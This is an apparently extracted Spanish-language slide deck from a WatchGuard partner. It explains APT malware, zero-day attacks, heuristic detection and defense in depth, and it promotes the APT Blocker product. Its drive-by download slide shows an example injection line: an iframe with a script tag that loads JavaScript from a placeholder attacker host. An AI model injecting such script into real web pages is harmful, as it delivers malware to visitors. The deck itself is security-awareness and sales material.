El documento proporciona información sobre amenazas cibernéticas avanzadas como los ataques APT. Explica conceptos como vulnerabilidades, exploits, ataques de día cero, y discute técnicas de evasión utilizadas por malware avanzado. También describe estrategias de defensa en profundidad y recomienda el uso de herramientas como APT Blocker para detectar amenazas avanzadas de manera proactiva.
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
Apt malware
1. La confianza es la mejor conexión
La confianza es la mejor conexión
2. La confianza es la mejor conexión
Conozca y detecte los nuevos
ataques cibernéticos APT a los que
se expone su empresa
3. La confianza es la mejor conexión
• Conceptos de Ataques
• Mercadeo de Amenazas
• Que es APT
• Historia del APT
• Ataques al SMB
• Estrategia de Defensa en Profundidad
• APT Blocker Watchguard
• Detección mediante análisis de tráfico
TEMARIO
4. La confianza es la mejor conexión
Qué es una Vulnerabilidad y Exploit ?
Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar algún
método para explotarla.
Un exploit es aquel proceso o software que ataca una vulnerabilidad particular
de un sistema o aplicación.
5. La confianza es la mejor conexión
Ataque de Dia Cero
Ventana de Vulnerabilidad
6. La confianza es la mejor conexión
Qué es Heurística?
Encontrar una solución
por prueba y error o por
reglas basadas en la
experiencia.
7. La confianza es la mejor conexión
Qué es Heurística Pasiva ?
Su
Analiza programas tratando
de encontrar código anómalo
antes de pasarlo a correr en
el proceso central.
Busca patrones de subrutinas,
o llamadas de programas que
indiquen comportamiento
malicioso.
19. La confianza es la mejor conexión
Qué es Heurística Activa?
Su
El motor ejecuta el código en un
ambiente Virtual
controlado”SandBox”.Analizando
los cambios en el entorno virtual.
La Heurística Activa puede
detectar código malicioso
encriptado, codificado
compresión y código
polimorfo
20. La confianza es la mejor conexión
Qué son las APT ?
Advanced Persistant Threat
(APT) Malware de alta tecnología
diseñado para ser sigiloso y
mantener el control de un sistema
21. La confianza es la mejor conexión
Características Principales de un APT
21
• Amenaza dedicada a blanco especifico
• Utiliza técnicas sofisticadas
• Comunicaciones Cifradas.
• Se puede transmitir USB
• Usa Puertos 80,443,53
• Ingeniería social
• Vulnerabilidades de día cero
• Certificados fraudulentos
• Mando y Control Centralizado
• Sin ser detectados durante períodos
prolongados
• Enmascaramiento exfiltración
22. La confianza es la mejor conexión
Las Técnicas de APT ahora atacan las
SMB
Zeus copia los ataques Stuxnet 0 day
Criminales usan 0 day malware (Cryptolocker)
Zeus usa Certificados Robados
Spear phishing
Criminales con Ataques watering hole
Ahora, los criminales del malware utilizan las
mismas tácticas avanzadas que los que
realizan ataques de estado.
Cada organizacion esta en riesgo de los APT!
23. La confianza es la mejor conexión
Por qué atacar la SMB ?
GRAN EMPRESA $$$$
SMB $
24. La confianza es la mejor conexión
“ MENOS DEL 1% DE LOS EMPLEADOS MANTIENEN CONDUCTAS
MALICIOSAS O TRATAN DE ATACAR LA EMPRESA. PERO EL 100% DE LOS
EMPLEADOS PUEDEN SER COMPROMETIDOS SIN DARSE CUENTA
PARA ATACAR LA EMPRESA”
¨”El Hacker puede aprovechar cualquier info de las Redes Sociales”
25. La confianza es la mejor conexión
Principales Regiones Generadores de APT
26. La confianza es la mejor conexión
Línea de tiempo de las Amenazas
GhostNet
Operation
Aurora
Stuxnet
RSA/Lockheed
Duqu
Flame
Gauss
NYTimes
Adobe
Target
Mar.
2009
Jan.
2010
Jun.
2010
Mar.
2011
Sep.2
011 May
2012
Dec.
2013
Jun.
2012
Jan.
2013
2009 2010 2011 2012 2013 2014
Oct.
2013
China-based
C&C
Spear Phishing
Political Targets
IE 0day
Comment Crew
(CN)
Stole Gmail and
Src
Four 0day
PLC Rootkit
Broke
Centrifuges
0day Flash Flaw
0dayTrojan
Stole SecureID
Info
0day Word flaw
Iran, Sudan,
Syrian
Cyber
Espionage
0day MS Cert
Flaw
Stole IP
Target Iranian
Oil
Targeted
Lebanon
USB LNK Flaw
APT Bank Trojan
152M records
0day
Coldfusion
Stolen source
China-based
Spear
phishing
0day
malware
40M CCNs
0day
malware
Partner
access
Nacion-Estado / Politica Criminales / Privadas
27. La confianza es la mejor conexión
Método de Infección
Drive by Download
DBDB
Parte 1: Ataque automatizado SQL ,HTML InjectionParte 2: Drive-by Download
<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe> OR IFRAME
30. La confianza es la mejor conexión
Herramientas Comerciales para
Hacking y Phishing
31. La confianza es la mejor conexión
Software de Evasión Dinámica
• Revisa el entorno
• Herramientas disponibles para descarga
Derrota al sandbox y a
las máquinas virtuales
32. La confianza es la mejor conexión
Estrategia de defensa en profundidad
tradicionales
Algunas alternativas incluyen la
mitigación del riesgo basados en
capas de seguridad y control de
Parches.
Las APT y los Ataques de Dia Cero
pueden sobrepasar las capas.
Administración de Parches
Control de vulnerabilidades Proactivo
Control de Aplicaciones y
Proxys
Control Gris
Control de dispositivos
y navegación
Control del flujo
AV/IPs
Control Conocido
Cifrado de media y disco
Control de Datos
33. La confianza es la mejor conexión
Efectividad del AV e IPs?
Pros:
• Detiene “background noise” malware
• Puede detectar código reutilizado ( baja
probabilidad )
• Podria detener payloads despues de ser
descubiertos
Cons:
• No es una defense Proactiva ante las APT
• Evade la Euristica mediante encripció y
enmascaramiento de operaciones en
tiempo.
• La Heuristica Dinámica es de alto
desempeño y baja tasa de detecciòn.
Av/ips
Control the Known
34. La confianza es la mejor conexión
Efectividad Device Control Y Navegacion
(Control WEB y Reputación)
Device Control y
Navegacion
Control the Flow
Pros:
• Puede evitar que los dispositivos no autorizados o las
descargas inyectan malware.
• Puede parar determinados tipos de archivos se copien
en máquinas host
• Método preventivo.
Cons:
• Siempre hay un host que esta expuesto por excepción
de políticas Ataque lateral.
35. La confianza es la mejor conexión
Efectividad del cifrado?
Cifrado de Media y Disco Duro
Control the Data
Pros:
• Hace adquisición de datos lateral más difícil
• Una buena capa de protección de datos fuera de la
APT
Cons:
• Generalmente no protegerá los datos si el punto final
se ve comprometida a nivel de sistema
36. La confianza es la mejor conexión
Efectividad del Control de Aplicaciones y Proxys
Control de Aplicaciones y
Proxys DPI
Control the Grey
Pros:
• Extremadamente eficaz contra los ataques de día cero
• Detiene desconocidos , cargas útiles de malware
dirigidos
• Impacto bajo rendimiento en los puntos finales
Cons:
• A medida que la flexibilidad de las política se
incrementa deja de ser efectivo.
• No detiene inyecciones en memoria ( ataques que no
escapan a la memoria de servicio)
37. La confianza es la mejor conexión
Efectividad de Administración Parches
Administracion de Parches
Control the Vulnerability Landscape
Pros:
• Elimina la superficie atacable que los hackers pueden
dirigir
• Configuración central de cortafuegos de escritorio
nativas
• Mejora el rendimiento de punto final y la estabilidad
• Se puede activar la protección de la inyección de
memoria nativa
Cons:
• No detiene ataques de día Cero
38. La confianza es la mejor conexión
Advanced Threats Require Defense-in-Depth
Advanced threats, by definition, leverage
multiple vectors of attack.
No single defense will protect you
completely from computer attacks…
Firewall
Intrusion Prevention System
AntiVirus
AntiSpam
Reputation Services
APT Protection
The more layers of security you have,
the higher chance an additional
protection might catch an advanced threat
that other layers might miss.
39. La confianza es la mejor conexión
XTM Defensa en profundidad + APT Blocker
Security Eco System
39
Default Threat Protection
Proxy – Web, Email, FTP, Dns
Application Control / IPS
Webblocker / RED / SpamBlocker
AV - Malware APTBlocker
40. La confianza es la mejor conexión
Para proteger a las empresas de las nuevas
amenazas APT, es necesario tener todas las
protecciones tradicionales y en adición tener
herramientas específicas para bloquearlas.
erability Landscape
41. La confianza es la mejor conexión
Curva de Ataques de Dia Cero
AV/IPS OS / ApplicationSandBox
Malware And
Virus Detection
42. La confianza es la mejor conexión
APT Blocker
Best of Breed Partner - Lastline
Fundada en 2011
Dir Redwood City, CA
8 años de investigación.
• Emulador de codigo mediante sandbox
en la Nube.
• Emulacion de Sistema incluyendo
actividad de Hardware
• Detecta malware Dia 0
• Inspecciona Millones de codigo en un
instante
• Puede detector técnicas de Evasion
43. La confianza es la mejor conexión
Malware (R)evolution
Simple Threats
OpportunisticAttacks
APT
Solutions
Antivirus
Solutions
TargetedAttacks
Packing
Sophisticated Threats
Plain
Virus
Poly-
morphic
C&C
Fluxing
Persistent
Threats
Evasive
Threats
44. La confianza es la mejor conexión
APT Blocker – Analisis de Malware en HD
Ejecución y emulación de código
Instrucciones de CPU Individuales
Acceso a memoria
Subrutinas de llamadas a sistema
Detección de Evasion
Provee granularidad y precisión que excede
A la competencia
45. La confianza es la mejor conexión
Windows XP and Windows 7
• All Windows Executable Files
• MS Word
• Excel
• PowerPoint
• PDF
Android
• APK
APT Blocker
46. La confianza es la mejor conexión
APTBlocker
Cache
Local
“Cache”
Remoto
Carga
Archivo
APT Blocker
47. La confianza es la mejor conexión
Visibilidad con WatchGuard Dimension
47
Advanced Malware in
Security Dashboard
48. La confianza es la mejor conexión
Reportes en WatchGuard Dimension
48
49. La confianza es la mejor conexión
La Visibilidad Explica porqué esto es Malware
49
Drill down to find why the
activity is determined to
be malware
50. La confianza es la mejor conexión
Security Dashboard
• Blocked Clients
• Blocked Destinations
• Blocked URL Categories
• Blocked Applications
• Blocked Protocols
• Blocked Intrusions
• Blocked Viruses
52. La confianza es la mejor conexión
RECOMENDACIONES DE SEGURIDAD
• Establecer Políticas de seguridad y control de acceso.
• Establecer sitios de contingencia y backups
• Establecer un plan de desastres y recuperación
• Actualizar firmas y parches
• No dejar abiertos servicios innecesarios
• Contar con tecnología apropiada
• Realizar inspecciones de Https
• Usar diferentes capas de seguridad que cierren el vector de ataque
• Estar actualizado sobre nuevas amenazas
• Educar a los usuarios en materia de seguridad
• Poseer un plan de seguridad
• No ver los sistemas de seguridad como cajas negras
• Tener Herramientas de visibilidad y correlación de trafico en forma grafica.
53. La confianza es la mejor conexión
Antivirus
URL
Filtering
AntiSpam
IPS
App
Control
Platform
WatchGuard Architecture
3 Year Effort
Delivered the most flexible
architecture / platform for UTM
Highest Performance
Leading UTM performance at
each price point
Management Console
“Single Pane of Glass” policy-
driven console
UTM Firmware
Spanning across all hardware
platforms
Modular Structure
To support “vendor agnostic”
strategy
Hardware:
Multiple CPU partners for best
fit to specific product line
Software:
Always Best-of-Breed software
components, with speedy
integration APT
WATCHGUARD VERDADERA DEFENSA EN
PROFUNDIDAD Y APT
54. La confianza es la mejor conexión
IBW WatchGuard Gold Partner y el único Partner MSSP en Centro America
IBW posee mas de 15 años de experiencia en redes y telecomunicaciones
Mas de 10 años de experiencia en seguridad de Redes
Unico Integrador de soluciones de seguridad en Internet y Datos
Cuenta con personal certificado en los diferentes producto
Soporte remoto certificado 7/24 por medio de call center NOC
Garantía avanzada incluyendo gastos y tramites de aduana